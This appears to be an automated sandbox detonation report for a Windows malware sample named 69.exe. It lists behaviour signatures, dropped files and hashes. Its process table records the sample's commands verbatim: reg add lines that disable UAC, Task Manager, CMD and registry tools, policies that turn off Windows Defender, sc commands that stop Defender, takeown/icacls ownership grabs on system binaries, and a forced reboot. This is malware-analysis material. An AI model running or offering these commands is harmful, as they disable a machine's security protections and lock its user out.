Analysis Overview
SHA256: 6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7
Threat Level: Known bad
The file 69.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Stops running service(s)
Disables Task Manager via registry modification
Possible privilege escalation attempt
Executes dropped EXE
Modifies file permissions
Enumerates connected drives
Drops file in System32 directory
Launches sc.exe
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Delays execution with timeout.exe
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-10-10 22:42
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2024-10-10 22:41
Reported: 2024-10-10 22:42
Platform: win11-20240802-en
Max time kernel: 9s
Max time network: 22s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\PerfLogs\windows\exec.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\jumpscare.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\K: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\unregmp2.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sethc.exe | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\regedit.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\69.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\exec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\jumpscare.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Delays execution with timeout.exe
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\69.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\unregmp2.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command Line |
| --- | --- |
| C:\Users\Admin\AppData\Local\Temp\69.exe | "C:\Users\Admin\AppData\Local\Temp\69.exe" |
| C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs" |
| C:\PerfLogs\windows\exec.exe | "C:\PerfLogs\windows\exec.exe" |
| C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE70.tmp\AE71.tmp\AE72.bat C:\PerfLogs\windows\exec.exe" |
| C:\PerfLogs\windows\jumpscare.exe | jumpscare.exe |
| C:\PerfLogs\windows\rnbowspam.exe | rnbowspam.exe |
| C:\Windows\System32\takeown.exe | takeown /f taskmgr.exe |
| C:\Windows\System32\takeown.exe | takeown /f sethc.exe |
| C:\Windows\System32\icacls.exe | icacls "sethc.exe" /granted "Admin":F |
| C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AFC9.tmp\AFC9.tmp\AFCA.bat C:\PerfLogs\windows\rnbowspam.exe" |
| C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AFC8.tmp\AFC9.tmp\AFCA.bat C:\PerfLogs\windows\jumpscare.exe" |
| C:\Windows\System32\icacls.exe | icacls "taskmgr.exe" /granted "Admin":F |
| C:\Windows\System32\takeown.exe | takeown /f reg.exe |
| C:\Windows\System32\icacls.exe | icacls "reg.exe" /granted "Admin":F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K rainbow.bat |
| C:\Windows\system32\timeout.exe | timeout /t 1 |
| C:\Program Files\Windows Media Player\wmplayer.exe | wmplayer.exe "C:\PerfLogs\windows\tape.mp4" |
| C:\Windows\system32\takeown.exe | takeown /f regedit.exe |
| C:\Windows\System32\unregmp2.exe | "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon |
| C:\Windows\system32\icacls.exe | icacls "regedit.exe" /granted "Admin":F |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost |
| C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K rainbow.bat |
| C:\Windows\system32\timeout.exe | timeout /t 1 |
| C:\Windows\system32\reg.exe | reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f |
| C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f |
| C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f |
| C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\AUDIODG.EXE | C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004CC |
| C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K rainbow.bat |
| C:\Windows\system32\timeout.exe | timeout /t 1 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\reg.exe | reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\rundll32.exe | RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\reg.exe | reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f |
| C:\Windows\system32\reg.exe | reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f |
| C:\Windows\system32\sc.exe | sc stop WinDefend |
| C:\Windows\system32\sc.exe | sc config WinDefend start=disabled |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\shutdown.exe | shutdown -r -t 0 |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
| C:\Windows\system32\LogonUI.exe | "LogonUI.exe" /flags:0x4 /state0:0xa39f4055 /state1:0x41c64e6d |
| C:\Windows\system32\timeout.exe | timeout /t 0 |
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
C:\PerfLogs\windows\warn.vbs
| Hash | Value |
| --- | --- |
| MD5 | 2f1738d26b35388f87f905ecc98cf408 |
| SHA1 | f1d20ac33b739f3d50d30891b743ef4374abbc5f |
| SHA256 | 83a4c5cf7db0f4de5d719209f7a76a16abae9cf990a9f8088d14f575cd94b0ba |
| SHA512 | e05c32f808a3a5e077b710623cab633a88aab12166ffaedbbd5906898fc1169ce1733bd40bb3b5b826f9a76ab0dfc640eddfd6e0b628b66d978d4c09f448c1f2 |
C:\PerfLogs\windows\exec.exe
| Hash | Value |
| --- | --- |
| MD5 | 236f1bc0ecb98edb8efdc31da513e819 |
| SHA1 | 47cc4e73c0f6d717eba708cf468bf6ecb9970086 |
| SHA256 | 517c7ce47c1ce1f168e5965caed3904f2752a55355844c6ba2d83a093068d9d4 |
| SHA512 | e8256b5d89debbdfeff230bc580ea2db106077366631eb83eb65795d4817e9a0fb93ac90419363fafaa0a3cd38253147ae7459174d01b9f6f414176151958109 |
C:\Users\Admin\AppData\Local\Temp\AE70.tmp\AE71.tmp\AE72.bat
| Hash | Value |
| --- | --- |
| MD5 | 47814c389b7e63ed5a13aa8dcc435f23 |
| SHA1 | 06f6fbfbeefaf56e651c2d4c4bf19f6adfe7dcd7 |
| SHA256 | 2e384305b1a2ee5dced93b6005f0bc99c9c2438b4d82674ff3c1d1ecfeec1f48 |
| SHA512 | 0cdacd5b894037ed33745f69d0820a6850e4cc11ac2e0ab0edb7a1bc699f296f2396fdce2005a859ca3c4e79a61a629a3fe378a060563b0a2291c32517254382 |
C:\PerfLogs\windows\jumpscare.exe
| Hash | Value |
| --- | --- |
| MD5 | 5425f894a45d90bac30ff9a34d2ad2f3 |
| SHA1 | 3d9b9708b4eb917142e7fb59ba61534db2c84e7b |
| SHA256 | 5f4d940457f8e9ae0e3313e7850e510833cbedf5b04b4c6bcc2b8bb47c317be2 |
| SHA512 | 9cf7b0bdaca5a6d8571f2f79ebb51c41dd52bd8f0dad1e81ab9a6508a3207a669895e9113d2d4c110b0692ab7d6c7be31f22ac0f1b668fdab5e354e051af59e7 |
C:\PerfLogs\windows\rnbowspam.exe
| Hash | Value |
| --- | --- |
| MD5 | e000d863f54529348b39030cbaf19aad |
| SHA1 | 9138d2cb83508bf24edee9cb581f60700a1c2b9b |
| SHA256 | 5fc50ced176ac39c74c605da6e6fe40e8083e36b680d31e844d6626f988245ea |
| SHA512 | 72dcb69e4a716420e3b6b4898a7cd92e658494ab5253b11f9c6f6aa8cc1017f8afa2ec306b36a6ffc8daedbd07a0b2247f96ca3e3ce50e13e2afeb47738f79df |
C:\Users\Admin\AppData\Local\Temp\AFC9.tmp\AFC9.tmp\AFCA.bat
| Hash | Value |
| --- | --- |
| MD5 | 517cae8cc74a0ef3cff3ca7f7dc1aa34 |
| SHA1 | af1538a03dfa1678ab2117c715682527e22f2450 |
| SHA256 | a99b20d186ad773ebac7925995120c0d0dee09865b4278dc2017125fefcf8194 |
| SHA512 | 8180b499fdba191143306c9e296cd6f6e54068e2717c27072d2f09aa3744d763eb68c88b3377ff6139cecd526f609454da0223f2946a0452bc6e8868ec8cd573 |
C:\Users\Admin\AppData\Local\Temp\AFC8.tmp\AFC9.tmp\AFCA.bat
| Hash | Value |
| --- | --- |
| MD5 | 5b094d5e0e750e15ab5628f608756249 |
| SHA1 | c73caec179b8baf3833413aaab31c384c48ccd45 |
| SHA256 | 5ce7469b14f3d4fb44c71359acbac51e6eb0ee7b0b002c0014bc9a46f6b91a3f |
| SHA512 | 5d6642ca13fe3951926d03f64ad56c360b73aa83c118b902254de9838198fed774604b977990523de555e9183fed716c4cd0edea65dcfe0c75962c0333c4849d |
C:\PerfLogs\windows\rainbow.bat
| Hash | Value |
| --- | --- |
| MD5 | 9d25a94b77c178f0d19bdd8440aaaade |
| SHA1 | c732a091461e0ebbd69f6f64b70016e13856908c |
| SHA256 | 55163b3be4667284a55e90d0cfd95f5efb8092efa22d4f58e1390d8aecec59f9 |
| SHA512 | e2c0815d709223601520dfebb4707417fa8f465980b9c329a253894e02eab2f90d053fbb321ddb62d73be297cb42cb9a81553030dbeda187fa18c17f68245e8d |
C:\PerfLogs\windows\logon_overwrte.exe
| Hash | Value |
| --- | --- |
| MD5 | f8df0742068fa14d5a4502de32acf41b |
| SHA1 | f862fcd7dafcafdf9e39c5c2d30c281d1bbc2cc0 |
| SHA256 | 9eaec2d603ae96e73a100713b5b77b8398d79049ab21013e6715fe3d6f1debcc |
| SHA512 | e894937999d9f13340d76cb0dbd3163d93e2a13f4dc66e6621a047a61691e8ecfcae29b36402c89ef3b9c7d60d415f62b259c1676701fe56c10a4d412506f186 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| Hash | Value |
| --- | --- |
| MD5 | 5433eab10c6b5c6d55b7cbd302426a39 |
| SHA1 | c5b1604b3350dab290d081eecd5389a895c58de5 |
| SHA256 | 23dbf7014e99e93af5f2760f18ee1370274f06a453145c8d539b66d798dad131 |
| SHA512 | 207b40d6bec65ab147f963a5f42263ae5bf39857987b439a4fa1647bf9b40e99cdc43ff68b7e2463aa9a948284126ac3c9c7af8350c91134b36d8b1a9c61fd34 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD
| Hash | Value |
| --- | --- |
| MD5 | 90be2701c8112bebc6bd58a7de19846e |
| SHA1 | a95be407036982392e2e684fb9ff6602ecad6f1e |
| SHA256 | 644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf |
| SHA512 | d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe |
C:\PerfLogs\windows\killrunas.vbs
| Hash | Value |
| --- | --- |
| MD5 | fb63b21fb318509a75324b1037da7876 |
| SHA1 | ff2c5b8e4f5640ecb4dfb7749495cbd73cc94cf1 |
| SHA256 | 3917fe5595894dd1cae684f7a42b4454743b63c86f266218d474506c7ff12f05 |
| SHA512 | 03ed3b9c6f2c15a11ad4e113c0c757242e6ebae38c96cdf066082fdffc286e76183aaca6b1e323a20803ac368f75468c1ff797d498f651fcc00d8eabbe8329f1 |
C:\PerfLogs\windows\69rnspam.exe
| Hash | Value |
| --- | --- |
| MD5 | 727793378d36b60cae54319b2f5e9e4d |
| SHA1 | 2171ea2f0ea01b39c71ea216a945816fa9ffe751 |
| SHA256 | b16e13c1d34e11e8a8318e405e4b90580802a1ee41489926785ab31fd822bcf2 |
| SHA512 | 66855458d7db3f181870aaebcae64025bb817f2b8f505189744fe3adf7f75a0f1d867192a870b75e33f36dae1006d764664ddd390fa5570a6de9f0108d5d0c91 |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| Hash | Value |
| --- | --- |
| MD5 | cb7e01aa7934596717166c67842937f6 |
| SHA1 | 28d4ed6dae0fe6bc4a85196c9de201ddae4cadda |
| SHA256 | 37aa3efbf96d63e646ad768f3b43a35297662efdddae4c529ca33d25579b8a6f |
| SHA512 | 4b725df5e6cc2ff8b5e7458d7a061cb14d7a8fdf1b3b57c1fb036ed6c5a8080154c6f9fffac39a771ca5d4c073e2e749a883ec369d2ffc65e779528ad978e26f |
C:\PerfLogs\windows\tape.mp4
| Hash | Value |
| --- | --- |
| MD5 | 3784764b2a5db2e23e744eaff79f40c8 |
| SHA1 | 33994de53dcf82b834961421b863181763166954 |
| SHA256 | 2234a0715ed3fc817cfd2ef5c065e26003620b68a66a4598a3ab599cdd5f50bf |
| SHA512 | f263f3f66e61bb7309e688e259db6111eb052a9fb494848b9763baecf2e8a1523adb2fa6c226950c871c7ce65194c4436622e689b09cb0d5d9693bff99a40a9f |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| Hash | Value |
| --- | --- |
| MD5 | dc31533c3ea8ac6915e86cb90616e9e2 |
